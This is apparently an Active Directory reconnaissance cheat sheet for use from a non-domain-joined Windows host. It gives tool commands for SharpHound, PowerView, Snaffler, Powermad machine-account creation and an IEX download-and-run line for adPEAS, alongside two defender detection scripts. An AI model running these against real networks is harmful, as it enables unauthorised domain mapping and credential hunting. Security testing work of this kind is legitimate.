## Active Directory Recon
## Enumeration from a non-domain-joined Windows computer
#### Note:
**Log in as a local administrator and, if DNS is not configured automatically when the IP address is assigned, first set your system's DNS server to the IP address of a domain controller in the target domain.**\
`(Control Panel > Network and Internet > Network Connections > Ethernet Properties > IPv4 Properties)`\
It can also be set from PowerShell:
```powershell
# Open a PowerShell window as Administrator.
Get-NetAdapter
$index = Read-Host -Prompt '[*] Interface index'
$dnsIp = Read-Host -Prompt '[*] DC IP address'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsIp
```
You should now be able to resolve the target domain:
```powershell
ping unsafe.local
nslookup unsafe.local
```
After running any of the `runas` commands below, verify that the SYSVOL and NETLOGON shares are reachable:
```powershell
net view \\unsafe.local
```
If the password given to `runas` was valid, the SYSVOL and NETLOGON shares are listed. `runas /netonly` does not verify the password when the process starts; a wrong password only shows up when the spawned process first touches the network, so run this check before anything else.
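From the domain controller's side, the `runas /netonly` technique above produces network logons whose source workstation name is not a computer account in the domain. The following added example, not part of the original page, is a defender's check that pulls those logons out of the Security log; it assumes it runs on a DC with the ActiveDirectory module and uses the made-up function name `Find-LogonsFromUnknownWorkstations`.

```powershell
# Added example (not from the original page). Run on a domain controller: lists
# network logons (event 4624, logon type 3) whose WorkstationName is not a computer
# account in the domain, which is how runas /netonly from a non-domain-joined host
# appears on the DC. The function name and the $Hours parameter are assumptions.
function Find-LogonsFromUnknownWorkstations {
    param([int]$Hours = 24)

    Import-Module ActiveDirectory
    # Known computer accounts (NetBIOS names), compared case-insensitively.
    # On a large domain, consider caching this list instead of rebuilding it each run.
    $known = [System.Collections.Generic.HashSet[string]]::new([StringComparer]::OrdinalIgnoreCase)
    Get-ADComputer -Filter * | ForEach-Object { [void]$known.Add($_.Name) }

    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Flatten the EventData <Data Name="..."> nodes into a hashtable
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # Type 3 = network logon (SMB, LDAP, RPC). Kerberos logons often carry an
        # empty or "-" workstation name, so those need IP-based correlation instead.
        if ($d.LogonType -ne '3') { return }
        $ws = $d.WorkstationName
        if ([string]::IsNullOrWhiteSpace($ws) -or $ws -eq '-') { return }
        if ($known.Contains($ws)) { return }

        [pscustomobject]@{
            Time        = $_.TimeCreated
            User        = "$($d.TargetDomainName)\$($d.TargetUserName)"
            Workstation = $ws            # client-supplied and spoofable; treat as a hint
            IpAddress   = $d.IpAddress   # the reliable pivot for asset/DHCP lookup
            AuthPackage = $d.AuthenticationPackageName
        }
    } | Group-Object Workstation, IpAddress |
      Sort-Object Count -Descending |
      Select-Object Count, Name, @{ n = 'Users'; e = { ($_.Group.User | Sort-Object -Unique) -join ', ' } }
}

Find-LogonsFromUnknownWorkstations -Hours 24 | Format-Table -AutoSize
```

Legitimate non-domain hosts (appliances, printers, BYOD) will also appear, so compare the list against the asset inventory before raising an alert.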


**Nslookup**
```powershell
# Find the domain controllers through the LDAP SRV record
C:\> nslookup
> set type=SRV
> _ldap._tcp.dc._msdcs.unsafe.local

# List all available records for the zone
C:\> nslookup -type=any unsafe.local
```


**Gpresult**
```powershell
# Display verbose policy information for a remote computer
gpresult /v /s target-IP /u username /p password /scope computer
gpresult /z /s target-IP /u username /p password /scope computer

# Display RSoP summary data for a remote computer
gpresult /r /s target-IP /u username /p password /scope computer
```


**RSAT**
```powershell
# 1. Download and install RSAT
# 2. Run cmd.exe as Administrator
# 3. Spawn an MMC as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser "mmc /server=unsafe.local"

# 4. In the MMC: File > Open, browse to C:\Windows\System32 and open a snap-in such as dsa.msc (Active Directory Users and Computers).
```
**PowerShell ActiveDirectory Module**
```powershell
# 1. Spawn a PowerShell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe

# 2. Run cmdlets, always pointing -Server at a DC because the host itself is not domain-joined
PS C:\> Get-ADDomain -Server DC1.unsafe.local
PS C:\> Get-ADUser -Identity luser -Server DC_IP_address -Properties *
```
**Netdom**
```powershell
# List workstation, server, dc, pdc, fsmo and trust information
C:\> netdom query fsmo /domain:unsafe.local
C:\> netdom query workstation /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query server /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query dc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query pdc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query trust /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss

# Add a computer account named "machine" (any authenticated user can do this while ms-DS-MachineAccountQuota, 10 by default, is above 0)
C:\> netdom add machine /d:unsafe.local /ud:UNSAFE\luser /pd:S3cP@ss
```
**Dsquery**
```powershell
# List user, computer, OU, site and server objects, or query with an LDAP filter
C:\> dsquery user -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery computer -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery ou -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery site -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery server -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery * "CN=Users,DC=unsafe,DC=local" -u unsafe\luser -p P@ssw0rd -d unsafe.local

# Users with the PASSWD_NOTREQD flag: userAccountControl bit 32 (0x20), tested with the LDAP_MATCHING_RULE_BIT_AND rule 1.2.840.113556.1.4.803
C:\> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl -u unsafe\luser -p P@ssw0rd -d unsafe.local
```


**PowerView**
```powershell
# 1. Spawn a PowerShell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe

# 2. Set the execution policy to Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser

# 3. Import the module
Import-Module C:\Users\desktop2\Desktop\AD-Tools\Tools\PowerView_dev.ps1

# 4. Run a cmdlet
Get-NetDomain
```


**ADACLScanner (unstable)**
```powershell
# 1. Spawn a PowerShell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe

# 2. Set the execution policy to Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser

# 3. Generate a report from the command line:
.\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -Output HTML -Show
.\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -EffectiveRightsPrincipal ruser -Output HTML -Show
```


**adPEAS**
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1')

# The Bloodhound module is left out of this run
Invoke-adPEAS -Domain unsafe.local -Username 'unsafe\luser' -Password 'S3cP@ss' -Module Domain,CA,Creds,Delegation,Accounts,Computer -Vulns
```


**ADRecon**
```powershell
# Run ADRecon from a non-member host over LDAP, naming a DC and supplying credentials explicitly
PS C:\> .\ADRecon.ps1 -Protocol LDAP -DomainController DC_IP_address -Credential (Get-Credential)
```


**SharpHound**
```powershell
# Method 1
# 1. Spawn a CMD shell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe

# 2. Run SharpHound, using the -d flag to specify the AD domain to collect from. Any other flags can be added.
C:\> SharpHound.exe -d unsafe.local -c All --outputdirectory C:\Users\desktop2\Desktop

# 3. Session loop collection (the loop runs for 2 hours by default)
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --Loopduration 01:00:00

# Method 2: pass the domain credentials to SharpHound directly instead of using runas
C:\> SharpHound.exe -d unsafe.local -c All --ldapusername ruser --ldappassword Password
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --ldapusername ruser --ldappassword Password
C:\> SharpHound.exe -d unsafe.local --CollectionMethods LoggedOn --ldapusername ruser --ldappassword Password

# Note: after uploading the data to Bloodhound, AD-miner can be run against the Neo4j database to produce a report.
AD-miner -c -cf Report -u neo4j -p mypassword
```


**PurpleKnight**
```powershell
# 1. Download PurpleKnight and unzip the archive
# 2. Spawn a CMD shell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe

# 3. Set the execution policy to Bypass
C:\> powershell -c "Set-ExecutionPolicy Bypass -Scope CurrentUser"

# 4. Run the executable from CMD
C:\> .\PurpleKnight.exe

# 5. The GUI opens and, because this host is not domain-joined, does not detect a forest; that is expected. Type the domain name (e.g. unsafe.local), then click Select > Next > Run tests.
```


**Pingcastle**
```powershell
# 1. Download PingCastle and unzip the archive
# 2. Spawn a CMD shell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe

# 3. Generate an HTML healthcheck report for the domain:
C:\> .\PingCastle.exe --log --healthcheck --server unsafe.local

# 4. Scan for the Zerologon vulnerability:
C:\> .\PingCastle.exe --log --scanner zerologon --server unsafe.local
```


**.NET System.DirectoryServices.ActiveDirectory namespace**
```powershell
# 1. Spawn a PowerShell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe

# Get the forest information:
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# Get the current user's domain information:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get information about the DCs:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers

# Find the primary DC (PDC emulator):
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner

# Find the schema master:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Forest.SchemaRoleOwner

# Get the trusts of a forest:
$forest = "unsafe.local"
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $forest)))).GetAllTrustRelationships()

# Get the trusts of the current domain:
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# Get a list of sites in the forest:
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites

# Determine the SID filtering status of a trust. If the output is "True", SID filtering is enabled.
$domain = "gotham.unsafe.local"
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetSidFilteringStatus($domain)
```


**Powermad**
```powershell
# 1. Spawn a PowerShell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe

# 2. Set the execution policy to Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser

# 3. Import the module
Import-Module .\Powermad.ps1

# 4. Add a machine account (allowed for ordinary users while ms-DS-MachineAccountQuota is above 0)
$pass = ConvertTo-SecureString "MaQ.321" -AsPlainText -Force
New-MachineAccount -MachineAccount maq -Password $pass -Verbose

# Get an attribute value of the machine account
Get-MachineAccountAttribute -MachineAccount maq -Attribute distinguishedname

# Get the SID of the machine account's creator (ms-DS-CreatorSID)
Get-MachineAccountCreator -DistinguishedName "CN=maq,CN=Computers,DC=unsafe,DC=local"
Get-MachineAccountCreator

# Set an attribute value of the machine account
Set-MachineAccountAttribute -MachineAccount maq -Attribute description -Value test

# Disable the machine account
Disable-MachineAccount -MachineAccount maq
```
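Both `netdom add` (Netdom section) and Powermad's `New-MachineAccount` above work for an ordinary domain user only because `ms-DS-MachineAccountQuota` defaults to 10, and every account created that way carries the creator's SID in `mS-DS-CreatorSID`. As an added example that is not part of the original page or the Powermad project, the audit below reports the quota, lists such computer accounts with their resolved creator, and can zero the quota; it assumes the ActiveDirectory module and the made-up names `Audit-MachineAccountQuota` and `-Remediate`.

```powershell
# Added example (not from the original page or Powermad). Run on a DC or a host with
# RSAT: reads ms-DS-MachineAccountQuota, lists computer accounts that carry
# mS-DS-CreatorSID (set only when the creator lacked Create Child rights, i.e. used
# the quota), and optionally sets the quota to 0. Function and switch names are assumptions.
function Audit-MachineAccountQuota {
    param([switch]$Remediate)

    Import-Module ActiveDirectory
    $domain = Get-ADDomain
    $quota = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    Write-Host "ms-DS-MachineAccountQuota for $($domain.DNSRoot): $quota"

    $created = Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties 'mS-DS-CreatorSID', whenCreated, OperatingSystem |
      ForEach-Object {
          # The attribute is a binary SID; wrap it and try to resolve it to an account
          $sid = [System.Security.Principal.SecurityIdentifier]::new($_.'mS-DS-CreatorSID', 0)
          try   { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value }
          catch { $creator = $sid.Value }   # creator may have been deleted since
          [pscustomobject]@{
              Computer = $_.Name
              Created  = $_.whenCreated
              Creator  = $creator
              OS       = $_.OperatingSystem   # usually empty for accounts that never really joined
              DN       = $_.DistinguishedName
          }
      }
    $created | Sort-Object Created -Descending | Format-Table Computer, Created, Creator, OS -AutoSize

    if ($Remediate -and $quota -ne 0) {
        # Requires Domain Admin (or equivalent). Joins through delegated rights keep
        # working and are still recorded as event 4741 on the DCs.
        Set-ADDomain -Identity $domain -Replace @{ 'ms-DS-MachineAccountQuota' = '0' }
        Write-Host 'ms-DS-MachineAccountQuota set to 0'
    }
}

Audit-MachineAccountQuota
```

Computer accounts whose creator is an ordinary user and whose OperatingSystem is empty are the ones worth reviewing; run with `-Remediate` once a delegated join process is in place.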


**LAPSToolkit**
```powershell
# 1. Spawn a PowerShell as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe

# 2. Set the execution policy to Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser

# 3. Import the module
Import-Module .\LAPSToolkit.ps1

# 4. Display all computers with LAPS enabled
Get-LAPSComputers

# 5. Search through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute
Find-LAPSDelegatedGroups

# 6. Check the rights on each LAPS-enabled computer for groups with read access and users with AllExtendedRights
Find-AdmPwdExtendedRights
```


**LDAPMonitor**
```powershell
# Monitor creation, deletion and changes of LDAP objects
C:\> SharpLDAPmonitor.exe /dcip:DC_IP_address /user:UNSAFE\luser /pass:S3cP@ss
```


**Snaffler**
```powershell
# 1. Spawn a CMD as a user in that domain using runas with its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe

# 2. Run Snaffler (-s prints to stdout, -c names the domain controller to query, -o writes the log file)
C:\> Snaffler.exe -s -d unsafe.local -c [DomainController-IP] -o snaffler.log
```


#### Reference
https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html \
https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html \
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc772217(v=ws.11) \
https://github.com/p0dalirius/LDAPmonitor \
https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps \
https://github.com/61106960/adPEAS \
https://github.com/Kevin-Robertson/Powermad \
https://github.com/leoloobeek/LAPSToolkit \
https://www.pingcastle.com/ \
https://www.purple-knight.com/ \
https://github.com/SnaffCon/Snaffler \
https://github.com/sense-of-security/ADRecon \
https://github.com/Mazars-Tech/AD_Miner
